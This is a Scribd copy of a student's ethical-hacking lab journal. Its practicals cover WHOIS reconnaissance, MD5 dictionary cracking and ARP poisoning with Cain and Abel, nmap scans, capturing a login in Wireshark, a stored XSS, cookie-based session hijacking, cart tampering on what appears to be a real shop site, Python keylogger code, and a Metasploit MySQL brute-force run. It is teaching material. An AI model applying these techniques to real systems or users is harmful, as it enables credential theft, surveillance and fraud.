Scribd
Upload
35 views27 pages

Ethical Hacking Journal - Final

The document provides information from running various commands and tools for reconnaissance and attack simulation. WHOIS lookup on google.com reveals registrar details. Practicals cover using CrypTool for encryption, Cain and Abel for password cracking and ARP poisoning, network commands in Linux like ifconfig and traceroute, Nmap port scanning, Wireshark packet capture, cross-site scripting attack simulation, and session impersonation using a Firefox add-on.

Uploaded by

Saket Malik
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
35 views27 pages

Ethical Hacking Journal - Final

The document provides information from running various commands and tools for reconnaissance and attack simulation. WHOIS lookup on google.com reveals registrar details. Practicals cover using CrypTool for encryption, Cain and Abel for password cracking and ARP poisoning, network commands in Linux like ifconfig and traceroute, Nmap port scanning, Wireshark packet capture, cross-site scripting attack simulation, and session impersonation using a Firefox add-on.

Uploaded by

Saket Malik
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 27

lOMoARcPSD|312 691 02

PRACTICAL 1
Aim: Use Google and Who.is for Reconnaissance

Registrar Info
Name

MarkMonitor International Canada Ltd.

Whois Server

whois.ca.fury.ca

Referral URL

Markmonitor.com

Status

clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
clientTransferProhibited https://icann.org/epp#clientTransferProhibited
clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
serverTransferProhibited https://icann.org/epp#serverTransferProhibited
serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited

Important Dates
Expires On

2023-04-28
lOMoARcPSD|312 691 02

Registered On

2000-10-04

Updated On

2022-09-01

Name Servers ns1.google.com


216.239.32.10
ns2.google.com 216.239.34.10
ns3.google.com 216.239.36.10
ns4.google.com 216.239.38.10
Similar Domains googl%c3%a8.com | googl%c4%95.com | googl%e2%84%85c3%a8.com |
googl%e2%84%85c3
%ef%bf%bd.com | googl e.com | googl--e.com | googl-.com | googl-1.com | googl-
2.com | googl-accts.com | googl-ak.com | googl-analistic.com | googl-analistic.net | googl-
analistic.ru | googl-analistic.ua | googl-analisys.com | googl-analitics.xyz | googl- analytics.com
| googl-android.ru | googl-apps-cloud.com |
Registrar Data
We will display stored WHOIS data for up to 30 days.

Registrant Contact Information:


Name
Google Canada Corporation
Organization
Google Canada Corporation
Address
12-111 Richmond St. W
City
Toronto
State / Province
ON
Postal Code
M5H2G4
Country
CA
lOMoARcPSD|312 691 02

Phone
+1.4162146034
Email

Administrative Contact Information:


Name
Google Canada Corporation
Organization
Google Canada Corporation
Address
12-111 Richmond St. W
City
Toronto
State / Province
ON
Postal Code
M5H2G4
Country
CA
Phone
+1.4162146034
Email

Technical Contact Information:


Name
Google Canada Corporation
Organization
Google Canada Corporation
Address
12-111 Richmond St. W
City
Toronto
State / Province
ON
Postal Code
M5H2G4
Country
CA
lOMoARcPSD|312 691 02

Phone
+1.4162146034
Email

Billing Contact Information:


Name
Google Canada Corporation
Organization
Google Canada Corporation
Address
12-111 Richmond St. W
City
Toronto
State / Province
ON
Postal Code
M5H2G4
Country
CA
Phone
+1.4162146034
Email

Information Updated: 2023-01-03 01:11:22


lOMoARcPSD|312 691 02

PRACTICAL 2 A
Aim: Use CrypTool to encrypt and decrypt passwords using RC4 algorithm

Text written for encryption as shown below:

Choose Encrypt/Decrypt from Toolbar and under Symmetric(modern) you will find RC4

Click on Encrypt and you will get the Encrypted text in a new window

Now with this window open, again go back to RC4 window and click on Decrypt. We will get
our original plain text back.
lOMoARcPSD|312 691 02

PRACTICAL 2B
Aim: Use Cain and Abel for cracking Windows account password using Dictionary attack and to
decode wireless network passwords
Prerequisites :
Cain and Abel, Internet
Steps :
1. Open the software, click on Cracker tab >> Hash Calculator tool as shown in the image.

2. A dialogue box appears after clicking on hash calculator, Add the text >> Calculate hash
code >> Copy MD5 hash value
lOMoARcPSD|312 691 02

3. Click on MD5 Hashes>> Add list>>Paste Hash Value.

4. Click on hash code right click, Dictionary Attack>>Add to list(Add the default Wordlist or
create your own with the Password>>Start
lOMoARcPSD|312 691 02

Match Found(If word in wordlist):


lOMoARcPSD|312 691 02

PRACTICAL 3A
Aim: Run and analyze the output of following commands in Linux – ifconfig, ping, netstat,
traceroute
Prerequisites :
KALI Linux, Internet
Steps :
1) In Kali Linux, open terminal and enter ifconfig

2) Type command – traceroute 8.8.8.8


lOMoARcPSD|312 691 02

3) Type command – netstat

4) Type command – ping 8.8.8.8


lOMoARcPSD|312 691 02

PRACTICAL 3 B
Aim: Perform ARP Poisoning in Windows

Steps:
We will use Cain and Abel for ARP Poisoning
Step 1 : Open Cain

Step 2 : Select sniffer tab on the top


Step 3 : Next to folder icon click on icon name start/stop sniffer. Select device and click on ok.
lOMoARcPSD|312 691 02

Step 4 : Click on “+” icon on the top. Click on ok.


Step 5 : Shows the Connected host.

Step 6 : Select Arp at bottom.


Step 7 : Click on “+” icon at the top.

Step 8 : Click on start/stop ARP icon on top.

Step 9 : Poisoning the source.


lOMoARcPSD|312 691 02

Step 10 : Go to any website on source ip address.

Step 11 : Go to password option in the cain & abel and see the visited site password.
lOMoARcPSD|312 691 02

PRACTICAL NO. 4
Aim: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL,
XMAS
Prerequisites :
KALI Linux, Internet
Steps :
NOTE: For using Nmap for Kali. open Terminal and type the below commands.
1) ACK -sA (TCP ACK scan)
It never determines open (or even open|filtered) ports. It is used to map out firewall rulesets,
\determining whether they are stateful or not and which ports are filtered.
Command: nmap -sA -T4 scanme.nmap.org

2) (Stealth) Scan (-sS)

SYN scan is the default and most popular scan option for good reason. It can be performed
quickly, scanning thousands of ports per second on a fast network not hampered by intrusive
firewalls.
Command: nmap -p22,113,139 scanme.nmap.org
lOMoARcPSD|312 691 02

3) FIN Scan (-sF)


Sets just the TCP FIN bit.
Command: nmap -sF -T4 8.8.8.8

4) NULL Scan (-sN)


Does not set any bits (TCP flag header is 0)
Command: nmap –sN –p 22 scanme.nmap.org
lOMoARcPSD|312 691 02

5) XMAS Scan (-sX)

Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.
Command: nmap -sX -T4 8.8.8.8
lOMoARcPSD|312 691 02

PRACTICAL 5
Aim: Use Wireshark (Sniffer) to capture network traffic and analyze

Steps:

Download and install Wireshark

Go to Capture -> Options -> Select Ethernet with Traffic and click on Start

You will now start seeing the network traffic

Now, go to browser and open http://techpanda.org. This is a sitewith a dummy login for us to
test the traffic analysis.
lOMoARcPSD|312 691 02

Login to the website using [email protected] and Password2020

Now stop the trafic analysis by clicking on Stop Capturing packets option at top left corner

Now look up http in the display filter and click on POST request with index.php

Now expand HTML form URL encoded to see the login credentials we posted using the HTML
form in the above website

END
lOMoARcPSD|312 691 02

PRACTICAL 6
Aim: Simulate persistent cross-site scripting attack

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected
into otherwise benign and trusted websites.

Steps:

Go to browser and open http://techpanda.org. This is a sitewith a dummy login for us to test
the traffic analysis.

Login to the website using [email protected] and Password2020


lOMoARcPSD|312 691 02

Now click on Add New Contact option and while entering the details, we will enter HTML
anchor tag with a link to an website as an input as shown below

Now click on save changes and go back to the site’s dashboard. You will see your record added
but instead of a text you will see a hyperlink text Subiksh.

Once we click on this link, it will route to the website we mentioned in the anchor tag.
lOMoARcPSD|312 691 02

PRACTICAL 7
Aim: Session impersonation using Firefox and Tamper Data add-on

We will be using EditThisCookie Add on for Session Impersonation and Tampering the Data.

Steps:

1) Install EditThisCookie Add on in your Firefox Browser

2) Go to browser and open http://techpanda.org. This is a sitewith a dummy login for us to


test the traffic analysis

3) Login to the website using [email protected] and Password2020


lOMoARcPSD|312 691 02

4) Now to the the Addon and Export the Cookie information and paste into a notepad

5) Once copied, close the browser window and go to http://techpanda.org website again. It
will again ask you to login with a new session.

6) Go to the Add on, delete the new cookie and replace with our previously copied cookie
using Import option.

7) Now refresh the page and your previous session will be impersonated giving you the access
without Login.

For Tamper Data, follow the below steps:

1) Go to https://www.ninjaremote.com/. and click on Add to Cart for any one product.


lOMoARcPSD|312 691 02

2) Then navigate to the cart option for further processing. You can see your order with
quantity set to 1.

3) No using EditThisCookie, copy the cookie and paste to your notepad. After this, edit the
cookie information, set "value": "10", for p_nr1 and nTotalUnits. Save the cookie and replace
with your existing cookie on the site.

4) Now refresh the page and your cart quantity data will be updated
lOMoARcPSD|312 691 02

PRACTICAL 8
Aim: Create a simple keylogger using python

Steps:
1) Run below Python file in IDLE :-

from pynput.keyboard import Key,

Listenerimport logging
# if no name it gets into an empty

stringlog_dir = ""

# This is a basic logging function


logging.basicConfig(filename=(log_dir+"key_log.txt"),
level=logging.DEBUG,format='%(asctime)s:%(message)s:')
# This is from the

librarydef

on_press(key):

logging.info(str(ke

y)) # This says,

listener is on

with Listener(on_press=on_press) as

listener:listener.join()

2) Enter a text in the output window and open the text file to see the logs of all the

keyboardinput done.
lOMoARcPSD|312 691 02

PRCTICAL 9
Aim: Using Metasploit to exploit (Kali Linux)

Prerequisites:
KALI Linux, Internet, HOST PC with MySQL 5.1.59 version

Steps:
1) Download and install MySQL 5.1.59 on your HOST PC to be attacked. Set a username – root and password –
root123

2) On your PC, using Oracle VirtualBox – Open Kali Linux. Open terminal and enter command msfconsole

3) Now search for mysql_login exploit using search mysql_login command and use the auxiliary
lOMoARcPSD|312 691 02

4) set RHOSTS as your Target IP address using command set RHOST 192.168.1.100

5) set USER_FILE as user.txt (this file needs to have some sample username to be tested in brute attack, if file not
created create one using following command – nano user.txt and then enter few usernames and save the file)

6) set PASS_FILE as pass.txt (follow step 5 for this as well)

7) Run command options to verfiy the settings

8) Finally run the exploit using the run command. Output will show Success and failed as results.
lOMoARcPSD|312 691 02

You might also like